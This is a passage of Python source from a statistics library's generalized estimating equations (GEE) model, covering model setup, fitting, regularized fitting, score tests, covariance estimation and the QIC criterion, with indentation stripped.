if "missing_idx" in kwargs and kwargs["missing_idx"] is not None:
# If here, we are entering from super.from_formula; missing
# has already been dropped from endog and exog, but not from
# the other variables.
ii = ~kwargs["missing_idx"]
groups = groups[ii]
if time is not None:
time = time[ii]
if offset is not None:
offset = offset[ii]
if exposure is not None:
exposure = exposure[ii]
del kwargs["missing_idx"]
_check_args(endog, exog, groups, time, offset, exposure)
self.missing = missing
self.dep_data = dep_data
self.constraint = constraint
self.update_dep = update_dep
self._fit_history = defaultdict(list)
# Pass groups, time, offset, and dep_data so they are
# processed for missing data along with endog and exog.
# Calling super creates self.exog, self.endog, etc. as
# ndarrays and the original exog, endog, etc. are
# self.data.endog, etc.
super(GEE, self).__init__(endog, exog, groups=groups,
time=time, offset=offset,
exposure=exposure, weights=weights,
dep_data=dep_data, missing=missing,
family=family, **kwargs)
self._init_keys.extend(["update_dep", "constraint", "family",
"cov_struct"])
# Handle the family argument
if family is None:
family = families.Gaussian()
else:
if not issubclass(family.__class__, families.Family):
raise ValueError("GEE: `family` must be a genmod "
"family instance")
self.family = family
# Handle the cov_struct argument
if cov_struct is None:
cov_struct = cov_structs.Independence()
else:
if not issubclass(cov_struct.__class__, cov_structs.CovStruct):
raise ValueError("GEE: `cov_struct` must be a genmod "
"cov_struct instance")
self.cov_struct = cov_struct
# Handle the constraint
self.constraint = None
if constraint is not None:
if len(constraint) != 2:
raise ValueError("GEE: `constraint` must be a 2-tuple.")
if constraint[0].shape[1] != self.exog.shape[1]:
raise ValueError(
"GEE: the left hand side of the constraint must have "
"the same number of columns as the exog matrix.")
self.constraint = ParameterConstraint(constraint[0],
constraint[1],
self.exog)
if self._offset_exposure is not None:
self._offset_exposure += self.constraint.offset_increment()
else:
self._offset_exposure = (
self.constraint.offset_increment().copy())
self.exog = self.constraint.reduced_exog()
# Create list of row indices for each group
group_labels, ix = np.unique(self.groups, return_inverse=True)
se = pd.Series(index=np.arange(len(ix)), dtype="int")
gb = se.groupby(ix).groups
dk = [(lb, np.asarray(gb[k])) for k, lb in enumerate(group_labels)]
self.group_indices = dict(dk)
self.group_labels = group_labels
# Convert the data to the internal representation, which is a
# list of arrays, corresponding to the groups.
self.endog_li = self.cluster_list(self.endog)
self.exog_li = self.cluster_list(self.exog)
if self.weights is not None:
self.weights_li = self.cluster_list(self.weights)
self.num_group = len(self.endog_li)
# Time defaults to a 1d grid with equal spacing
if self.time is not None:
if self.time.ndim == 1:
self.time = self.time[:, None]
self.time_li = self.cluster_list(self.time)
else:
self.time_li = \
[np.arange(len(y), dtype=np.float64)[:, None]
for y in self.endog_li]
self.time = np.concatenate(self.time_li)
if (self._offset_exposure is None or
(np.isscalar(self._offset_exposure) and
self._offset_exposure == 0.)):
self.offset_li = None
else:
self.offset_li = self.cluster_list(self._offset_exposure)
if constraint is not None:
self.constraint.exog_fulltrans_li = \
self.cluster_list(self.constraint.exog_fulltrans)
self.family = family
self.cov_struct.initialize(self)
# Total sample size
group_ns = [len(y) for y in self.endog_li]
self.nobs = sum(group_ns)
# The following are column based, not on rank see #1928
self.df_model = self.exog.shape[1] - 1 # assumes constant
self.df_resid = self.nobs - self.exog.shape[1]
# Skip the covariance updates if all groups have a single
# observation (reduces to fitting a GLM).
maxgroup = max([len(x) for x in self.endog_li])
if maxgroup == 1:
self.update_dep = False
# Override to allow groups and time to be passed as variable
# names.
@classmethod
def from_formula(cls, formula, groups, data, subset=None,
time=None, offset=None, exposure=None,
*args, **kwargs):
"""
Create a GEE model instance from a formula and dataframe.
Parameters
----------
formula : str or generic Formula object
The formula specifying the model
groups : array_like or string
Array of grouping labels. If a string, this is the name
of a variable in `data` that contains the grouping labels.
data : array_like
The data for the model.
subset : array_like
An array-like object of booleans, integers, or index
values that indicate the subset of the data to used when
fitting the model.
time : array_like or string
The time values, used for dependence structures involving
distances between observations. If a string, this is the
name of a variable in `data` that contains the time
values.
offset : array_like or string
The offset values, added to the linear predictor. If a
string, this is the name of a variable in `data` that
contains the offset values.
exposure : array_like or string
The exposure values, only used if the link function is the
logarithm function, in which case the log of `exposure`
is added to the offset (if any). If a string, this is the
name of a variable in `data` that contains the offset
values.
%(missing_param_doc)s
args : extra arguments
These are passed to the model
kwargs : extra keyword arguments
These are passed to the model with two exceptions. `dep_data`
is processed as described below. The ``eval_env`` keyword is
passed to patsy. It can be either a
:class:`patsy:patsy.EvalEnvironment` object or an integer
indicating the depth of the namespace to use. For example, the
default ``eval_env=0`` uses the calling namespace.
If you wish to use a "clean" environment set ``eval_env=-1``.
Optional arguments
------------------
dep_data : str or array_like
Data used for estimating the dependence structure. See
specific dependence structure classes (e.g. Nested) for
details. If `dep_data` is a string, it is interpreted as
a formula that is applied to `data`. If it is an array, it
must be an array of strings corresponding to column names in
`data`. Otherwise it must be an array-like with the same
number of rows as data.
Returns
-------
model : GEE model instance
Notes
-----
`data` must define __getitem__ with the keys in the formula
terms args and kwargs are passed on to the model
instantiation. E.g., a numpy structured or rec array, a
dictionary, or a pandas DataFrame.
""" % {'missing_param_doc': base._missing_param_doc}
groups_name = "Groups"
if isinstance(groups, str):
groups_name = groups
groups = data[groups]
if isinstance(time, str):
time = data[time]
if isinstance(offset, str):
offset = data[offset]
if isinstance(exposure, str):
exposure = data[exposure]
dep_data = kwargs.get("dep_data")
dep_data_names = None
if dep_data is not None:
if isinstance(dep_data, str):
dep_data = patsy.dmatrix(dep_data, data,
return_type='dataframe')
dep_data_names = dep_data.columns.tolist()
else:
dep_data_names = list(dep_data)
dep_data = data[dep_data]
kwargs["dep_data"] = np.asarray(dep_data)
family = None
if "family" in kwargs:
family = kwargs["family"]
del kwargs["family"]
model = super(GEE, cls).from_formula(formula, data=data, subset=subset,
groups=groups, time=time,
offset=offset,
exposure=exposure,
family=family,
*args, **kwargs)
if dep_data_names is not None:
model._dep_data_names = dep_data_names
model._groups_name = groups_name
return model
def cluster_list(self, array):
"""
Returns `array` split into subarrays corresponding to the
cluster structure.
"""
if array.ndim == 1:
return [np.array(array[self.group_indices[k]])
for k in self.group_labels]
else:
return [np.array(array[self.group_indices[k], :])
for k in self.group_labels]
def compare_score_test(self, submodel):
"""
Perform a score test for the given submodel against this model.
Parameters
----------
submodel : GEEResults instance
A fitted GEE model that is a submodel of this model.
Returns
-------
A dictionary with keys "statistic", "p-value", and "df",
containing the score test statistic, its chi^2 p-value,
and the degrees of freedom used to compute the p-value.
Notes
-----
The score test can be performed without calling 'fit' on the
larger model. The provided submodel must be obtained from a
fitted GEE.
This method performs the same score test as can be obtained by
fitting the GEE with a linear constraint and calling `score_test`
on the results.
References
----------
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
"""
# Since the model has not been fit, its scaletype has not been
# set. So give it the scaletype of the submodel.
self.scaletype = submodel.model.scaletype
# Check consistency between model and submodel (not a comprehensive
# check)
submod = submodel.model
if self.exog.shape[0] != submod.exog.shape[0]:
msg = "Model and submodel have different numbers of cases."
raise ValueError(msg)
if self.exog.shape[1] == submod.exog.shape[1]:
msg = "Model and submodel have the same number of variables"
warnings.warn(msg)
if not isinstance(self.family, type(submod.family)):
msg = "Model and submodel have different GLM families."
warnings.warn(msg)
if not isinstance(self.cov_struct, type(submod.cov_struct)):
warnings.warn("Model and submodel have different GEE covariance "
"structures.")
if not np.equal(self.weights, submod.weights).all():
msg = "Model and submodel should have the same weights."
warnings.warn(msg)
# Get the positions of the submodel variables in the
# parent model
qm, qc = _score_test_submodel(self, submodel.model)
if qm is None:
msg = "The provided model is not a submodel."
raise ValueError(msg)
# Embed the submodel params into a params vector for the
# parent model
params_ex = np.dot(qm, submodel.params)
# Attempt to preserve the state of the parent model
cov_struct_save = self.cov_struct
import copy
cached_means_save = copy.deepcopy(self.cached_means)
# Get the score vector of the submodel params in
# the parent model
self.cov_struct = submodel.cov_struct
self.update_cached_means(params_ex)
_, score = self._update_mean_params()
if score is None:
msg = "Singular matrix encountered in GEE score test"
warnings.warn(msg, ConvergenceWarning)
return None
if not hasattr(self, "ddof_scale"):
self.ddof_scale = self.exog.shape[1]
if not hasattr(self, "scaling_factor"):
self.scaling_factor = 1
_, ncov1, cmat = self._covmat()
score2 = np.dot(qc.T, score)
try:
amat = np.linalg.inv(ncov1)
except np.linalg.LinAlgError:
amat = np.linalg.pinv(ncov1)
bmat_11 = np.dot(qm.T, np.dot(cmat, qm))
bmat_22 = np.dot(qc.T, np.dot(cmat, qc))
bmat_12 = np.dot(qm.T, np.dot(cmat, qc))
amat_11 = np.dot(qm.T, np.dot(amat, qm))
amat_12 = np.dot(qm.T, np.dot(amat, qc))
try:
ab = np.linalg.solve(amat_11, bmat_12)
except np.linalg.LinAlgError:
ab = np.dot(np.linalg.pinv(amat_11), bmat_12)
score_cov = bmat_22 - np.dot(amat_12.T, ab)
try:
aa = np.linalg.solve(amat_11, amat_12)
except np.linalg.LinAlgError:
aa = np.dot(np.linalg.pinv(amat_11), amat_12)
score_cov -= np.dot(bmat_12.T, aa)
try:
ab = np.linalg.solve(amat_11, bmat_11)
except np.linalg.LinAlgError:
ab = np.dot(np.linalg.pinv(amat_11), bmat_11)
try:
aa = np.linalg.solve(amat_11, amat_12)
except np.linalg.LinAlgError:
aa = np.dot(np.linalg.pinv(amat_11), amat_12)
score_cov += np.dot(amat_12.T, np.dot(ab, aa))
# Attempt to restore state
self.cov_struct = cov_struct_save
self.cached_means = cached_means_save
from scipy.stats.distributions import chi2
try:
sc2 = np.linalg.solve(score_cov, score2)
except np.linalg.LinAlgError:
sc2 = np.dot(np.linalg.pinv(score_cov), score2)
score_statistic = np.dot(score2, sc2)
score_df = len(score2)
score_pvalue = 1 - chi2.cdf(score_statistic, score_df)
return {"statistic": score_statistic,
"df": score_df,
"p-value": score_pvalue}
def estimate_scale(self):
"""
Estimate the dispersion/scale.
"""
if self.scaletype is None:
if isinstance(self.family, (families.Binomial, families.Poisson,
families.NegativeBinomial,
_Multinomial)):
return 1.
elif isinstance(self.scaletype, float):
return np.array(self.scaletype)
endog = self.endog_li
cached_means = self.cached_means
nobs = self.nobs
varfunc = self.family.variance
scale = 0.
fsum = 0.
for i in range(self.num_group):
if len(endog[i]) == 0:
continue
expval, _ = cached_means[i]
sdev = np.sqrt(varfunc(expval))
resid = (endog[i] - expval) / sdev
if self.weights is not None:
f = self.weights_li[i]
scale += np.sum(f * (resid ** 2))
fsum += f.sum()
else:
scale += np.sum(resid ** 2)
fsum += len(resid)
scale /= (fsum * (nobs - self.ddof_scale) / float(nobs))
return scale
def mean_deriv(self, exog, lin_pred):
"""
Derivative of the expected endog with respect to the parameters.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed.
lin_pred : array_like
The values of the linear predictor.
Returns
-------
The value of the derivative of the expected endog with respect
to the parameter vector.
Notes
-----
If there is an offset or exposure, it should be added to
`lin_pred` prior to calling this function.
"""
idl = self.family.link.inverse_deriv(lin_pred)
dmat = exog * idl[:, None]
return dmat
def mean_deriv_exog(self, exog, params, offset_exposure=None):
"""
Derivative of the expected endog with respect to exog.
Parameters
----------
exog : array_like
Values of the independent variables at which the derivative
is calculated.
params : array_like
Parameter values at which the derivative is calculated.
offset_exposure : array_like, optional
Combined offset and exposure.
Returns
-------
The derivative of the expected endog with respect to exog.
"""
lin_pred = np.dot(exog, params)
if offset_exposure is not None:
lin_pred += offset_exposure
idl = self.family.link.inverse_deriv(lin_pred)
dmat = np.outer(idl, params)
return dmat
def _update_mean_params(self):
"""
Returns
-------
update : array_like
The update vector such that params + update is the next
iterate when solving the score equations.
score : array_like
The current value of the score equations, not
incorporating the scale parameter. If desired,
multiply this vector by the scale parameter to
incorporate the scale.
"""
endog = self.endog_li
exog = self.exog_li
weights = getattr(self, "weights_li", None)
cached_means = self.cached_means
varfunc = self.family.variance
bmat, score = 0, 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
if weights is not None:
w = weights[i]
wresid = resid * w
wdmat = dmat * w[:, None]
else:
wresid = resid
wdmat = dmat
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (wdmat, wresid))
if rslt is None:
return None, None
vinv_d, vinv_resid = tuple(rslt)
bmat += np.dot(dmat.T, vinv_d)
score += np.dot(dmat.T, vinv_resid)
try:
update = np.linalg.solve(bmat, score)
except np.linalg.LinAlgError:
update = np.dot(np.linalg.pinv(bmat), score)
self._fit_history["cov_adjust"].append(
self.cov_struct.cov_adjust)
return update, score
def update_cached_means(self, mean_params):
"""
cached_means should always contain the most recent calculation
of the group-wise mean vectors. This function should be
called every time the regression parameters are changed, to
keep the cached means up to date.
"""
endog = self.endog_li
exog = self.exog_li
offset = self.offset_li
linkinv = self.family.link.inverse
self.cached_means = []
for i in range(self.num_group):
if len(endog[i]) == 0:
continue
lpr = np.dot(exog[i], mean_params)
if offset is not None:
lpr += offset[i]
expval = linkinv(lpr)
self.cached_means.append((expval, lpr))
def _covmat(self):
"""
Returns the sampling covariance matrix of the regression
parameters and related quantities.
Returns
-------
cov_robust : array_like
The robust, or sandwich estimate of the covariance, which
is meaningful even if the working covariance structure is
incorrectly specified.
cov_naive : array_like
The model-based estimate of the covariance, which is
meaningful if the covariance structure is correctly
specified.
cmat : array_like
The center matrix of the sandwich expression, used in
obtaining score test results.
"""
endog = self.endog_li
exog = self.exog_li
weights = getattr(self, "weights_li", None)
varfunc = self.family.variance
cached_means = self.cached_means
# Calculate the naive (model-based) and robust (sandwich)
# covariances.
bmat, cmat = 0, 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
if weights is not None:
w = weights[i]
wresid = resid * w
wdmat = dmat * w[:, None]
else:
wresid = resid
wdmat = dmat
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (wdmat, wresid))
if rslt is None:
return None, None, None, None
vinv_d, vinv_resid = tuple(rslt)
bmat += np.dot(dmat.T, vinv_d)
dvinv_resid = np.dot(dmat.T, vinv_resid)
cmat += np.outer(dvinv_resid, dvinv_resid)
scale = self.estimate_scale()
try:
bmati = np.linalg.inv(bmat)
except np.linalg.LinAlgError:
bmati = np.linalg.pinv(bmat)
cov_naive = bmati * scale
cov_robust = np.dot(bmati, np.dot(cmat, bmati))
cov_naive *= self.scaling_factor
cov_robust *= self.scaling_factor
return cov_robust, cov_naive, cmat
# Calculate the bias-corrected sandwich estimate of Mancl and
# DeRouen.
def _bc_covmat(self, cov_naive):
cov_naive = cov_naive / self.scaling_factor
endog = self.endog_li
exog = self.exog_li
varfunc = self.family.variance
cached_means = self.cached_means
scale = self.estimate_scale()
bcm = 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (dmat,))
if rslt is None:
return None
vinv_d = rslt[0]
vinv_d /= scale
hmat = np.dot(vinv_d, cov_naive)
hmat = np.dot(hmat, dmat.T).T
f = self.weights_li[i] if self.weights is not None else 1.
aresid = np.linalg.solve(np.eye(len(resid)) - hmat, resid)
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (aresid,))
if rslt is None:
return None
srt = rslt[0]
srt = f * np.dot(dmat.T, srt) / scale
bcm += np.outer(srt, srt)
cov_robust_bc = np.dot(cov_naive, np.dot(bcm, cov_naive))
cov_robust_bc *= self.scaling_factor
return cov_robust_bc
def _starting_params(self):
if np.isscalar(self._offset_exposure):
offset = None
else:
offset = self._offset_exposure
model = GLM(self.endog, self.exog, family=self.family,
offset=offset, freq_weights=self.weights)
result = model.fit()
return result.params
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust', ddof_scale=None, scaling_factor=1.,
scale=None):
self.scaletype = scale
# Subtract this number from the total sample size when
# normalizing the scale parameter estimate.
if ddof_scale is None:
self.ddof_scale = self.exog.shape[1]
else:
if not ddof_scale >= 0:
raise ValueError(
"ddof_scale must be a non-negative number or None")
self.ddof_scale = ddof_scale
self.scaling_factor = scaling_factor
self._fit_history = defaultdict(list)
if self.weights is not None and cov_type == 'naive':
raise ValueError("when using weights, cov_type may not be naive")
if start_params is None:
mean_params = self._starting_params()
else:
start_params = np.asarray(start_params)
mean_params = start_params.copy()
self.update_cached_means(mean_params)
del_params = -1.
num_assoc_updates = 0
for itr in range(maxiter):
update, score = self._update_mean_params()
if update is None:
warnings.warn("Singular matrix encountered in GEE update",
ConvergenceWarning)
break
mean_params += update
self.update_cached_means(mean_params)
# L2 norm of the change in mean structure parameters at
# this iteration.
del_params = np.sqrt(np.sum(score ** 2))
self._fit_history['params'].append(mean_params.copy())
self._fit_history['score'].append(score)
self._fit_history['dep_params'].append(
self.cov_struct.dep_params)
# Do not exit until the association parameters have been
# updated at least once.
if (del_params < ctol and
(num_assoc_updates > 0 or self.update_dep is False)):
break
# Update the dependence structure
if (self.update_dep and (itr % params_niter) == 0
and (itr >= first_dep_update)):
self._update_assoc(mean_params)
num_assoc_updates += 1
if del_params >= ctol:
warnings.warn("Iteration limit reached prior to convergence",
IterationLimitWarning)
if mean_params is None:
warnings.warn("Unable to estimate GEE parameters.",
ConvergenceWarning)
return None
bcov, ncov, _ = self._covmat()
if bcov is None:
warnings.warn("Estimated covariance structure for GEE "
"estimates is singular", ConvergenceWarning)
return None
bc_cov = None
if cov_type == "bias_reduced":
bc_cov = self._bc_covmat(ncov)
if self.constraint is not None:
x = mean_params.copy()
mean_params, bcov = self._handle_constraint(mean_params, bcov)
if mean_params is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
y, ncov = self._handle_constraint(x, ncov)
if y is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
if bc_cov is not None:
y, bc_cov = self._handle_constraint(x, bc_cov)
if x is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
scale = self.estimate_scale()
# kwargs to add to results instance, need to be available in __init__
res_kwds = dict(cov_type=cov_type,
cov_robust=bcov,
cov_naive=ncov,
cov_robust_bc=bc_cov)
# The superclass constructor will multiply the covariance
# matrix argument bcov by scale, which we do not want, so we
# divide bcov by the scale parameter here
results = GEEResults(self, mean_params, bcov / scale, scale,
cov_type=cov_type, use_t=False,
attr_kwds=res_kwds)
# attributes not needed during results__init__
results.fit_history = self._fit_history
self.fit_history = defaultdict(list)
results.score_norm = del_params
results.converged = (del_params < ctol)
results.cov_struct = self.cov_struct
results.params_niter = params_niter
results.first_dep_update = first_dep_update
results.ctol = ctol
results.maxiter = maxiter
# These will be copied over to subclasses when upgrading.
results._props = ["cov_type", "use_t",
"cov_params_default", "cov_robust",
"cov_naive", "cov_robust_bc",
"fit_history",
"score_norm", "converged", "cov_struct",
"params_niter", "first_dep_update", "ctol",
"maxiter"]
return GEEResultsWrapper(results)
def _update_regularized(self, params, pen_wt, scad_param, eps):
sn, hm = 0, 0
for i in range(self.num_group):
expval, _ = self.cached_means[i]
resid = self.endog_li[i] - expval
sdev = np.sqrt(self.family.variance(expval))
ex = self.exog_li[i] * sdev[:, None]**2
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (resid, ex))
sn0 = rslt[0]
sn += np.dot(ex.T, sn0)
hm0 = rslt[1]
hm += np.dot(ex.T, hm0)
# Wang et al. divide sn here by num_group, but that
# seems to be incorrect
ap = np.abs(params)
clipped = np.clip(scad_param * pen_wt - ap, 0, np.inf)
en = pen_wt * clipped * (ap > pen_wt)
en /= (scad_param - 1) * pen_wt
en += pen_wt * (ap <= pen_wt)
en /= eps + ap
hm.flat[::hm.shape[0] + 1] += self.num_group * en
sn -= self.num_group * en * params
try:
update = np.linalg.solve(hm, sn)
except np.linalg.LinAlgError:
update = np.dot(np.linalg.pinv(hm), sn)
msg = "Encountered singularity in regularized GEE update"
warnings.warn(msg)
hm *= self.estimate_scale()
return update, hm
def _regularized_covmat(self, mean_params):
self.update_cached_means(mean_params)
ma = 0
for i in range(self.num_group):
expval, _ = self.cached_means[i]
resid = self.endog_li[i] - expval
sdev = np.sqrt(self.family.variance(expval))
ex = self.exog_li[i] * sdev[:, None]**2
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (resid,))
ma0 = np.dot(ex.T, rslt[0])
ma += np.outer(ma0, ma0)
return ma
def fit_regularized(self, pen_wt, scad_param=3.7, maxiter=100,
ddof_scale=None, update_assoc=5,
ctol=1e-5, ztol=1e-3, eps=1e-6, scale=None):
"""
Regularized estimation for GEE.
Parameters
----------
pen_wt : float
The penalty weight (a non-negative scalar).
scad_param : float
Non-negative scalar determining the shape of the Scad
penalty.
maxiter : int
The maximum number of iterations.
ddof_scale : int
Value to subtract from `nobs` when calculating the
denominator degrees of freedom for t-statistics, defaults
to the number of columns in `exog`.
update_assoc : int
The dependence parameters are updated every `update_assoc`
iterations of the mean structure parameter updates.
ctol : float
Convergence criterion, default is one order of magnitude
smaller than proposed in section 3.1 of Wang et al.
ztol : float
Coefficients smaller than this value are treated as
being zero, default is based on section 5 of Wang et al.
eps : non-negative scalar
Numerical constant, see section 3.2 of Wang et al.
scale : float or string
If a float, this value is used as the scale parameter.
If "X2", the scale parameter is always estimated using
Pearson's chi-square method (e.g. as in a quasi-Poisson
analysis). If None, the default approach for the family
is used to estimate the scale parameter.
Returns
-------
GEEResults instance. Note that not all methods of the results
class make sense when the model has been fit with regularization.
Notes
-----
This implementation assumes that the link is canonical.
References
----------
Wang L, Zhou J, Qu A. (2012). Penalized generalized estimating
equations for high-dimensional longitudinal data analysis.
Biometrics. 2012 Jun;68(2):353-60.
doi: 10.1111/j.1541-0420.2011.01678.x.
https://www.ncbi.nlm.nih.gov/pubmed/21955051
http://users.stat.umn.edu/~wangx346/research/GEE_selection.pdf
"""
self.scaletype = scale
mean_params = np.zeros(self.exog.shape[1])
self.update_cached_means(mean_params)
converged = False
fit_history = defaultdict(list)
# Subtract this number from the total sample size when
# normalizing the scale parameter estimate.
if ddof_scale is None:
self.ddof_scale = self.exog.shape[1]
else:
if not ddof_scale >= 0:
raise ValueError(
"ddof_scale must be a non-negative number or None")
self.ddof_scale = ddof_scale
# Keep this private for now. In some cases the early steps are
# very small so it seems necessary to ensure a certain minimum
# number of iterations before testing for convergence.
miniter = 20
for itr in range(maxiter):
update, hm = self._update_regularized(
mean_params, pen_wt, scad_param, eps)
if update is None:
msg = "Singular matrix encountered in regularized GEE update",
warnings.warn(msg, ConvergenceWarning)
break
if itr > miniter and np.sqrt(np.sum(update**2)) < ctol:
converged = True
break
mean_params += update
fit_history['params'].append(mean_params.copy())
self.update_cached_means(mean_params)
if itr != 0 and (itr % update_assoc == 0):
self._update_assoc(mean_params)
if not converged:
msg = "GEE.fit_regularized did not converge"
warnings.warn(msg)
mean_params[np.abs(mean_params) < ztol] = 0
self._update_assoc(mean_params)
ma = self._regularized_covmat(mean_params)
cov = np.linalg.solve(hm, ma)
cov = np.linalg.solve(hm, cov.T)
# kwargs to add to results instance, need to be available in __init__
res_kwds = dict(cov_type="robust", cov_robust=cov)
scale = self.estimate_scale()
rslt = GEEResults(self, mean_params, cov, scale,
regularized=True, attr_kwds=res_kwds)
rslt.fit_history = fit_history
return GEEResultsWrapper(rslt)
def _handle_constraint(self, mean_params, bcov):
"""
Expand the parameter estimate `mean_params` and covariance matrix
`bcov` to the coordinate system of the unconstrained model.
Parameters
----------
mean_params : array_like
A parameter vector estimate for the reduced model.
bcov : array_like
The covariance matrix of mean_params.
Returns
-------
mean_params : array_like
The input parameter vector mean_params, expanded to the
coordinate system of the full model
bcov : array_like
The input covariance matrix bcov, expanded to the
coordinate system of the full model
"""
# The number of variables in the full model
red_p = len(mean_params)
full_p = self.constraint.lhs.shape[1]
mean_params0 = np.r_[mean_params, np.zeros(full_p - red_p)]
# Get the score vector under the full model.
save_exog_li = self.exog_li
self.exog_li = self.constraint.exog_fulltrans_li
import copy
save_cached_means = copy.deepcopy(self.cached_means)
self.update_cached_means(mean_params0)
_, score = self._update_mean_params()
if score is None:
warnings.warn("Singular matrix encountered in GEE score test",
ConvergenceWarning)
return None, None
_, ncov1, cmat = self._covmat()
scale = self.estimate_scale()
cmat = cmat / scale ** 2
score2 = score[red_p:] / scale
amat = np.linalg.inv(ncov1)
bmat_11 = cmat[0:red_p, 0:red_p]
bmat_22 = cmat[red_p:, red_p:]
bmat_12 = cmat[0:red_p, red_p:]
amat_11 = amat[0:red_p, 0:red_p]
amat_12 = amat[0:red_p, red_p:]
score_cov = bmat_22 - np.dot(amat_12.T,
np.linalg.solve(amat_11, bmat_12))
score_cov -= np.dot(bmat_12.T,
np.linalg.solve(amat_11, amat_12))
score_cov += np.dot(amat_12.T,
np.dot(np.linalg.solve(amat_11, bmat_11),
np.linalg.solve(amat_11, amat_12)))
from scipy.stats.distributions import chi2
score_statistic = np.dot(score2,
np.linalg.solve(score_cov, score2))
score_df = len(score2)
score_pvalue = 1 - chi2.cdf(score_statistic, score_df)
self.score_test_results = {"statistic": score_statistic,
"df": score_df,
"p-value": score_pvalue}
mean_params = self.constraint.unpack_param(mean_params)
bcov = self.constraint.unpack_cov(bcov)
self.exog_li = save_exog_li
self.cached_means = save_cached_means
self.exog = self.constraint.restore_exog()
return mean_params, bcov
def _update_assoc(self, params):
"""
Update the association parameters
"""
self.cov_struct.update(params)
def _derivative_exog(self, params, exog=None, transform='dydx',
dummy_idx=None, count_idx=None):
"""
For computing marginal effects, returns dF(XB) / dX where F(.)
is the fitted mean.
transform can be 'dydx', 'dyex', 'eydx', or 'eyex'.
Not all of these make sense in the presence of discrete regressors,
but checks are done in the results in get_margeff.
"""
# This form should be appropriate for group 1 probit, logit,
# logistic, cloglog, heckprob, xtprobit.
offset_exposure = None
if exog is None:
exog = self.exog
offset_exposure = self._offset_exposure
margeff = self.mean_deriv_exog(exog, params, offset_exposure)
if 'ex' in transform:
margeff *= exog
if 'ey' in transform:
margeff /= self.predict(params, exog)[:, None]
if count_idx is not None:
from statsmodels.discrete.discrete_margins import (
_get_count_effects)
margeff = _get_count_effects(margeff, exog, count_idx, transform,
self, params)
if dummy_idx is not None:
from statsmodels.discrete.discrete_margins import (
_get_dummy_effects)
margeff = _get_dummy_effects(margeff, exog, dummy_idx, transform,
self, params)
return margeff
def qic(self, params, scale, cov_params):
"""
Returns quasi-information criteria and quasi-likelihood values.
Parameters
----------
params : array_like
The GEE estimates of the regression parameters.
scale : scalar
Estimated scale parameter
cov_params : array_like
An estimate of the covariance matrix for the
model parameters. Conventionally this is the robust
covariance matrix.
Returns
-------
ql : scalar
The quasi-likelihood value
qic : scalar
A QIC that can be used to compare the mean and covariance
structures of the model.
qicu : scalar
A simplified QIC that can be used to compare mean structures
but not covariance structures
Notes
-----
The quasi-likelihood used here is obtained by numerically evaluating
Wedderburn's integral representation of the quasi-likelihood function.
This approach is valid for all families and links. Many other
packages use analytical expressions for quasi-likelihoods that are
valid in special cases where the link function is canonical. These
analytical expressions may omit additive constants that only depend
on the data. Therefore, the numerical values of our QL and QIC values
will differ from the values reported by other packages. However only
the differences between two QIC values calculated for different models
using the same data are meaningful. Our QIC should produce the same
QIC differences as other software.
When using the QIC for models with unknown scale parameter, use a
common estimate of the scale parameter for all models being compared.
References
----------
.. [*] W. Pan (2001). Akaike's information criterion in generalized
estimating equations. Biometrics (57) 1.
"""
varfunc = self.family.variance
means = []
omega = 0.0
# omega^-1 is the model-based covariance assuming independence
for i in range(self.num_group):
expval, lpr = self.cached_means[i]
means.append(expval)
dmat = self.mean_deriv(self.exog_li[i], lpr)
omega += np.dot(dmat.T, dmat) / scale
means = np.concatenate(means)
# The quasi-likelihood, use change of variables so the integration is
# from -1 to 1.
endog_li = np.concatenate(self.endog_li)
du = means - endog_li
nstep = 10000
qv = np.empty(nstep)
xv = np.linspace(-0.99999, 1, nstep)
for i, g in enumerate(xv):
u = endog_li + (g + 1) * du / 2.0
vu = varfunc(u)
qv[i] = -np.sum(du**2 * (g + 1) / vu)
qv /= (4 * scale)
from scipy.integrate import trapz
ql = trapz(qv, dx=xv[1] - xv[0])
qicu = -2 * ql + 2 * self.exog.shape[1]
qic = -2 * ql + 2 * np.trace(np.dot(omega, cov_params))
return ql, qic, qicu
class GEEResults(GLMResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model "
"using GEE.\n" + _gee_results_doc)
def __init__(self, model, params, cov_params, scale,
cov_type='robust', use_t=False, regularized=False,
**kwds):
super(GEEResults, self).__init__(
model, params, normalized_cov_params=cov_params,
scale=scale)
# not added by super
self.df_resid = model.df_resid
self.df_model = model.df_model
self.family = model.family
attr_kwds = kwds.pop('attr_kwds', {})
self.__dict__.update(attr_kwds)
# we do not do this if the cov_type has already been set
# subclasses can set it through attr_kwds
if not (hasattr(self, 'cov_type') and
hasattr(self, 'cov_params_default')):
self.cov_type = cov_type # keep alias
covariance_type = self.cov_type.lower()
allowed_covariances = ["robust", "naive", "bias_reduced"]
if covariance_type not in allowed_covariances:
msg = ("GEE: `cov_type` must be one of " +
", ".join(allowed_covariances))
raise ValueError(msg)
if cov_type == "robust":
cov = self.cov_robust
elif cov_type == "naive":
cov = self.cov_naive
elif cov_type == "bias_reduced":
cov = self.cov_robust_bc
self.cov_params_default = cov
else:
if self.cov_type != cov_type:
raise ValueError('cov_type in argument is different from '
'already attached cov_type')
@cache_readonly
def resid(self):
"""
The response residuals.
"""
return self.resid_response
def standard_errors(self, cov_type="robust"):
"""
This is a convenience function that returns the standard
